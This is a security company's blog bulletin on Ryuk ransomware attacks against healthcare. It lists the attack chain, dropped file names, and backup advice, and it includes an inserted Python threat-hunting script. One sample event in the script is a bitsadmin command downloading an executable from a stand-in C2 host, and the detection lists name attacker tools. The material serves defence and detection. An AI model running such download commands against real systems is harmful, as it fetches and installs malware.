Ryuk Ransomware Attack in Healthcare

RE: The joint statement made by the FBI and Cybersecurity & Infrastructure Security Agency (CISA), “Ransomware Activity Targeting the Healthcare and Public Health Sector”

FRSecure has been working with the FBI and CISA, directly and indirectly since Saturday, October 24 to assist in the investigation of a credible threat to U.S. hospitals and healthcare providers. During recent incident response engagements, we’ve seen indicators of compromise (IoCs) that confirm Ryuk ransomware attacks are occurring. However, there are still concerns about the nature of such attacks.

Despite our involvement, we chose to be very careful in how we released information to the public. Feeding into any unnecessary fear, uncertainty, or doubt related to events is counter to our mission. Because the FBI and CISA have made their public announcement, we feel comfortable sharing what we know with you.

If you notice unusual activity in your technology environment or have information about an incident, please email us at [email protected] for immediate assistance.

Learn More in Our Webinar

We hosted a live webinar on Friday, October 30th, at 12 p.m. CST to answer your questions about this developing threat. View the recording here.

About the Attack

The threat of a Ryuk ransomware incident is real. Many details about the joint FBI and CISA announcement are still not known, including attacker coordination, how widespread it may/may not be, timing, and context. We cannot say with certainty that this is a widespread coordinated attack.

This is developing news, and we want to make sure everyone is aware. It’s our collective responsibility to be proactive in finding indicators of compromise (IoC), sharing them with our community, taking preventative measures, and ensuring our response capabilities are effective.

Based upon the IoCs obtained during our investigations, here’s what we’ve seen.

Often, the attack starts with email phishing and/or emails containing an attachment with a malicious payload. In some cases, the attackers used malicious links or existing open connections to the internal network (RDP/TCP 3389, for instance); however, phishing has been the most common initial attack vector.

See “Key Findings and Resources” below for more detailed information, but here are some immediate tips for you to limit your chances of suffering from a ransomware attack.


  • Important: Ensure your data is backed up consistently and that your backups are stored off-network.
    • Any network connectivity could potentially be leveraged by an attacker to destroy your backups.
    • Test your restoration capabilities by testing your backups—even to the point of full/bare-metal restores.
  • Bring any unusual activity to your IT/security team’s attention.
  • If you are able, look for common IoCs. If you suspect any are present, immediately bring them to your IT/security team’s attention.
  • If you’re not experiencing anything unusual or seeing any IoCs, great! You are in a position to continue your preparation. Consider completing your own ransomware readiness assessment.

Key Findings and Resources

If you are seeing any of the indicators or activities described below in your environment, you may already be ransomed or about to be—even if systems appear to be functioning normally.

The tactics, techniques, and procedures (TTPs) outlined in this communication are or could be associated with the advanced persistent threat (APT) group known as UNC1878. UNC1878 is believed to be the primary organization involved in the joint FBI/CISA announcement.

These indicators can change quickly, and this should not be considered a full, complete, or static dataset.

  • Typical Payload Delivery Method: 
    • Phishing email > TrickBot (malware) > Cobalt Strike (tool) > Ryuk (ransomware)
      NOTE: Cobalt Strike is always used to deliver this attack. Empire (C2) and Metasploit are sometimes used in addition.
    • Secondary payload deployment methods include batch scripts using PSEXEC, BITSadmin, and Windows Management Instrumentation (WMI).
      NOTE: If you see any unexpected behavior from these legitimate processes, investigate further.
  • Typical Domains for Command and Control (C2):
  • Reconnaissance Tools Used:
  • Credential Harvesting Tools Used:
  • Typical File Names and Locations:
    • Files are usually dropped at c:\user\XXX\AppData\Roaming\xxx.exe
    • Names include:
      • P32.exe
      • P64.exe
      • vVv.exe
      • wmi.bat
      • xxx.exe
      • zZz.exe
      • 1234.zip
      • socks.exe
      • defender.exe
      • _paxe.exe
  • Other Details:
    • Utilizes Signed Code
    • DIT (AD Database) and Registry theft
      • Typically, no other data theft
      • No history of extortion
    • Time to ransom (TTR)
      • Average: 5 days, 17 hours
      • Fastest: 2 days, 6 hours
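As an added example (not FRSecure's code), the hunt below applies two of the bulletin's indicators to Sysmon-style process-creation events: the listed file names when they run from the AppData\Roaming drop location, and any launch of the admin tools named as secondary deployment vehicles. The ADMIN_TOOLS set, the path regex and the sample events are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass

# File names quoted in the bulletin above (compared case-insensitively).
IOC_FILE_NAMES = {
    "p32.exe", "p64.exe", "vvv.exe", "wmi.bat", "xxx.exe",
    "zzz.exe", "1234.zip", "socks.exe", "defender.exe", "_paxe.exe",
}
# Legitimate admin tools the bulletin names as secondary deployment vehicles (assumed binaries).
ADMIN_TOOLS = {"psexec.exe", "psexec64.exe", "psexesvc.exe", "bitsadmin.exe", "wmic.exe"}
# Drop location from the bulletin: C:\Users\<user>\AppData\Roaming\<file> (assumed pattern).
ROAMING_DROP = re.compile(r"^[a-z]:\\users?\\[^\\]+\\appdata\\roaming\\[^\\]+$", re.I)

@dataclass
class Hit:
    host: str
    reason: str
    detail: str

def hunt(events):
    """One Hit per suspicious Sysmon-style process-creation event
    (dict with 'host', 'image' = full path started, 'cmdline')."""
    hits = []
    for ev in events:
        image = ev["image"]
        name = image.rsplit("\\", 1)[-1].lower()
        # Listed name AND listed location: both must hold to limit false positives.
        if name in IOC_FILE_NAMES and ROAMING_DROP.match(image):
            hits.append(Hit(ev["host"], "bulletin-filename-in-roaming", image))
        # Any launch of these tools is surfaced for review, as the bulletin advises.
        if name in ADMIN_TOOLS:
            hits.append(Hit(ev["host"], "admin-tool-launch", ev["cmdline"]))
    return hits

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Users\jdoe\AppData\Roaming\P64.exe",
     "cmdline": r"C:\Users\jdoe\AppData\Roaming\P64.exe"},
    {"host": "ws01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download http://c2.example/socks.exe ..."},
    {"host": "srv02", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "WMIC /node:ws03 ..."},
    {"host": "ws04", "image": r"C:\Program Files\Vendor\defender.exe",
     "cmdline": "defender.exe"},   # listed name, wrong location: not flagged
    {"host": "ws04", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(f"{h.host}: {h.reason}: {h.detail}")
```

Feed it the process-creation events exported from your SIEM or EDR in the same three-field shape; the admin-tool hits are triage leads, not verdicts.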

External Resources

Here are additional and credible resources you can use to assist you in preparation, detection, and response:

Final Thoughts

We cannot stress enough how important it is for you to be prepared. If you see any of the IoCs listed in this bulletin in your environment, please bring them to the attention of your internal security team immediately and reach out to us. FRSecure is always here to help!

Please share this message with everyone, but especially with organizations you know in the healthcare and healthcare supply chain industry sectors. There is certainly the potential that the Ryuk threat will continue to grow.

It’s up to us to get out ahead of it.

Thank you in advance.

Evan Francen
CEO at FRSecure
Nickname: "The Truth"

I am a 25+ year information security veteran, and I tell it like I see it. I’m not known for being politically correct, and this sometimes gets me into trouble. More often than not, however, clients and colleagues come to appreciate the candor and common sense approach. If you look at security (the right way), you’ll find that it’s just not as complicated as people make it. I hope you enjoy my writings on security and other miscellaneous things. I really have a strong and deep passion for helping people and making the world a better place.

Check out my new book UNSECURITY
